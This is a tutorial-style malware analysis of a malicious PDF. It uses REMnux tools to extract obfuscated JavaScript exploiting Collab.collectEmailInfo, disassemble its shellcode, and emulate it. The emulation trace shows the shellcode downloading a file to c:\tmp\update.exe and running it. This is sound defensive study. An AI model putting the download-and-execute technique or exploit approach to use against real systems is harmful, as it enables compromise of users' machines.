


I will describe the process of analyzing a malicious PDF file.

$ file pdf3.pdf 
pdf3.pdf: PDF document, version 1.4
$ pdfinfo pdf3.pdf 
Error (45188): Illegal character '>'
Error: PDF file is damaged - attempting to reconstruct xref table...
Creator:        Scribus
Producer:       Scribus PDF Library
CreationDate:   Sat Jul 11 08:11:56 2009
ModDate:        Sat Jul 11 08:11:56 2009
Tagged:         no
Pages:          1
Encrypted:      no
Page size:      595.28 x 841.89 pts (A4)
File size:      57348 bytes
Optimized:      no
PDF version:    1.4

For our analysis, we will need:

  • The REMnux distribution (it ships with all of the tools listed below)
  • pdfid to identify objects in our PDF file
  • pdf-parser to list JavaScript objects
  • pdfobjflow to map the relationships between the PDF objects
  • jsunpackn to extract JavaScript contained in the PDF file
  • SpiderMonkey to run and de-obfuscate the JavaScript
  • Libemu/sctest to emulate the shellcode
  • command line (to convert our shellcode to various formats)

Identify objects

List objects

Let's first identify the objects contained in the PDF file, with pdfid.

remnux@remnux:~/malware$ pdfid pdf3.pdf 
PDFiD 0.1.2 pdf3.pdf
 PDF Header: %PDF-1.4
 obj                   40
 endobj                40
 stream                25
 endstream             25
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    3
 /JavaScript            4
 /AA                    0
 /OpenAction            0
 /AcroForm              1
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
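
To make the idea behind this keyword count concrete, here is a minimal Python sketch. It is not pdfid's actual implementation: the function names and the shortened keyword list are assumptions made for illustration. It decodes #XX hex escapes in PDF names (so an obfuscated /#4AS is counted as /JS) and then counts whole-name matches. Decoding escapes over the entire file is a simplification, since it also touches binary stream data.

```python
import re

# Shortened keyword list, chosen for illustration only.
KEYWORDS = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/AcroForm", b"/Launch"]

def decode_name_escapes(data: bytes) -> bytes:
    """Replace #XX hex escapes (e.g. #4A -> J) so obfuscated names still match."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def count_keywords(data: bytes) -> dict:
    """Count occurrences of each keyword as a complete PDF name."""
    normalized = decode_name_escapes(data)
    counts = {}
    for kw in KEYWORDS:
        # The negative lookahead rejects longer names that merely start with kw.
        pattern = re.escape(kw) + rb"(?![A-Za-z0-9])"
        counts[kw.decode()] = len(re.findall(pattern, normalized))
    return counts
```

For a real file, something like count_keywords(open("pdf3.pdf", "rb").read()) would give a rough approximation of the table above. The numbers may differ from pdfid's because of the simplifications mentioned.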

Search for JavaScript

The pdfid output above shows that our PDF file contains JavaScript (/JS 3, /JavaScript 4). Let's list the objects involved:

remnux@remnux:~/malware$ pdf-parser --search=JavaScript pdf3.pdf 
obj 37 0
 Referencing: 34 0 R

    /S /JavaScript
    /JS 34 0 R

obj 38 0
 Referencing: 35 0 R

    /S /JavaScript
    /JS 35 0 R

obj 39 0
 Referencing: 36 0 R

    /S /JavaScript
    /JS 36 0 R

obj 7 0
 Referencing: 40 0 R

    /JavaScript 40 0 R
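
The "Referencing" lines in this listing already tell us which object points to which. As a rough sketch (this is not how pdfobjflow is implemented; the function names are hypothetical), the listing can be parsed into edges and rendered as Graphviz DOT text:

```python
import re

def reference_edges(listing: str) -> list:
    """Return (source_object, referenced_object) pairs from pdf-parser style text."""
    edges = []
    current = None
    for line in listing.splitlines():
        line = line.strip()
        header = re.match(r"obj (\d+) (\d+)$", line)
        if header:
            current = header.group(1)  # object number; generation is ignored
            continue
        if line.startswith("Referencing:") and current is not None:
            # A single line may list several references ("34 0 R, 35 0 R").
            for target in re.findall(r"(\d+) \d+ R", line):
                edges.append((current, target))
    return edges

def to_dot(edges) -> str:
    """Render the edges as a Graphviz digraph."""
    body = "\n".join(f'  "{src}" -> "{dst}";' for src, dst in edges)
    return "digraph pdf {\n" + body + "\n}"

# The listing shown above, reduced to the lines the parser needs.
LISTING = """\
obj 37 0
 Referencing: 34 0 R
obj 38 0
 Referencing: 35 0 R
obj 39 0
 Referencing: 36 0 R
obj 7 0
 Referencing: 40 0 R
"""
```

Calling to_dot(reference_edges(LISTING)) yields four edges: 37 to 34, 38 to 35, 39 to 36, and 7 to 40.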

Chained JavaScript objects

Let's see how these objects are linked with pdf-parser and pdfobjflow:

remnux@remnux:~/malware$ pdf-parser pdf3.pdf | pdfobjflow 
remnux@remnux:~/malware$ feh pdfobjflow.png

Here is an extract of the output (image not reproduced):

Extract JavaScript

We could use pdf-parser to extract the JavaScript code contained in the PDF file. However, since the code appears to be split across three objects (34, 35 and 36), it is easier to use jsunpackn:

remnux@remnux:~/malware$ jsunpack-extractjs pdf3.pdf


Found JavaScript in 34 0 (44132 bytes)
	children []
	tags [["TAGVAL", "Length", "46 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
	indata = << /Length 46/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx]Y,q+A�8jyl`U�;B~=6Q>UY|ddo�~�>?~z~
Found JavaScript in 35 0 (265 bytes)
	children []
	tags [["TAGVAL", "Length", "43 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
	indata = << /Length 43/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamxM@E_EfnAfTEr�sF+=Z:K0jvEa[2U{W%iO\-
Found JavaScript in 7 0 (0 bytes)
	children [["JavaScript", "40 0"]]
	tags [["ENDTAG", "JavaScript", "40 0 R "]]
	indata = << /JavaScript 40 0 R >>
Found JavaScript in 36 0 (214 bytes)
	children []
	tags [["TAGVAL", "Length", "62 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
	indata = << /Length 62/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx=@_%XuDDH"vH:njO_izi4]�0i2Rj3iShlQY
Wrote JavaScript (45564 bytes -- 953 headers / 44611 code) to file pdf3.pdf.out
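
Note that the filter name in each stream dictionary is written with #XX hex escapes, a common way to hide names from naive scanners. The sketch below (helper names are hypothetical) decodes such a name and shows how a FlateDecode stream would be inflated with Python's zlib module. The "x" right after "stream" in the output above is consistent with a zlib header byte (0x78).

```python
import re
import zlib

def decode_pdf_name(name: str) -> str:
    """Decode #XX hex escapes in a PDF name, e.g. '/#46late' -> '/Flate'."""
    return re.sub(r"#([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), name)

def inflate_stream(raw: bytes) -> bytes:
    """Decompress the bytes found between 'stream' and 'endstream'."""
    return zlib.decompress(raw)

# The escaped filter name exactly as it appears in the jsunpack output.
OBFUSCATED_FILTER = "/#46#6c#61#74#65#44#65#63#6f#64#65"
```

Here decode_pdf_name(OBFUSCATED_FILTER) returns "/FlateDecode", which confirms that the three JavaScript streams are simply zlib-compressed.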

Jsunpackn confirmed the presence of JavaScript and wrote its output to pdf3.pdf.out. Before we can execute the JavaScript, we must remove the jsunpack headers from this output.

Execute JavaScript

Now, let's strip the header lines (tail -n+18 keeps everything from line 18 onward), save the result in a file named pdf3.js, and run it with SpiderMonkey:

remnux@remnux:~/malware$ tail -n+18 pdf3.pdf.out > pdf3.js
remnux@remnux:~/malware$ js -f /usr/local/etc/def.js -f pdf3.js > pdf3.out

Let's see what the result looks like: it is an exploit targeting Collab.collectEmailInfo.

Extract shellcode

Let's extract the shellcode contained in the array sIIxQHCE. With the array contents saved to temp.unicode, we remove the quotes and commas:

remnux@remnux:~/malware$ sed "s/[',]//g" temp.unicode > shellcode.unicode
remnux@remnux:~/malware$ more shellcode.unicode 

Analyze shellcode


The shellcode first needs to find its own address in memory. It does so with the CALL/POP technique, visible in the disassembly below (call 0xd followed by pop ebp):

remnux@remnux:~/malware$ cat shellcode.unicode | unicode2hex-escaped > shellcode.hex 
remnux@remnux:~/malware$ cat shellcode.hex | sed "s/\\\x//g" | rasm -a x86 -d - | head -n 20
0000 00  push eax
0000 00  push ebx ; cursor+0x3
0000 00  push ecx ; cursor+0x1
0000 00  push edx ; cursor+0x2
0000 00  push esi ; cursor+0x6
0000 00  push edi ; cursor+0x7
0000 00  push ebp ; cursor+0x5
0000 00  pushfd 
0000 00  call 0xd  ; 1 = 0x0000000d
0000 00  pop ebp
0000 00  sub ebp, 0xd
0000 00  xor eax, eax
0000 00  add eax, [fs:eax+0x30]
0000 00  js 0x25  ; 2 = 0x00000025
0000 00  mov eax, [eax+0xc]
0000 00  mov esi, [eax+0x1c]
0000 00  lodsd 
0000 00  mov eax, [eax+0x8]
0000 00  jmp 0x2e  ; 3 = 0x0000002e
0000 00  mov eax, [eax+0x34]
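
The CALL/POP arithmetic can be checked with a few lines of Python. This is only a sketch: the offsets are inferred from the listing (eight one-byte instructions before the call, and a 5-byte call whose target is 0xd), because the offset column above is not usable, and the load address is an arbitrary value chosen for illustration.

```python
CALL_OFFSET = 0x8   # inferred: seven pushes plus pushfd, one byte each
CALL_LENGTH = 5     # inferred: E8 opcode followed by a 32-bit displacement

def locate_base(load_address: int) -> int:
    """Mimic call/pop/sub to recover the address where the shellcode starts."""
    # 'call 0xd' pushes the address of the next instruction onto the stack.
    return_address = load_address + CALL_OFFSET + CALL_LENGTH
    # 'pop ebp' reads that address back into a register.
    ebp = return_address
    # 'sub ebp, 0xd' rewinds to the first byte of the shellcode.
    ebp -= 0xD
    return ebp
```

Whatever address the shellcode is loaded at, locate_base returns that same address, which is why the code can then reach its own data relative to ebp.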

Emulate shellcode with libemu

Let's analyze the shellcode with libemu sctest. We first need to convert our shellcode to raw format:

remnux@remnux:~/malware$ cat shellcode.unicode | unicode2raw > shellcode.raw

Now we can use sctest:

remnux@remnux:~/malware$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt
remnux@remnux:~/malware$ more sctest-out.txt 
verbose = 1
cpu error error accessing 0x00000004 not mapped

stepcount 32150
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x0041715e => 
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 => 
           = "URLMON.DLL";
) = 0x7df20000;
     HMODULE hModule = 0x7df20000 => 
     LPCSTR lpProcName = 0x00417250 => 
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
     LPCTSTR szURL = 0x00417278 => 
           = "";
     LPCTSTR szFileName = 0x0041715e => 
           = "c:\tmp\update.exe";
     DWORD dwReserved = 0;
) =  0;
     LPCSTR lpCmdLine = 0x0041715e => 
           = "c:\tmp\update.exe";
     UINT uCmdShow = 5;
) =  32;
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x0041715e => 
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 => 
           = "URLMON.DLL";
) = 0x7df20000;
     HMODULE hModule = 0x7df20000 => 

A temporary path (C:\tmp\) is first retrieved to store the file that will be downloaded. URLMON.DLL is then loaded, and its URLDownloadToFileA function is used to download a file from the Internet. The downloaded file is saved to c:\tmp\update.exe and executed by WinExec.
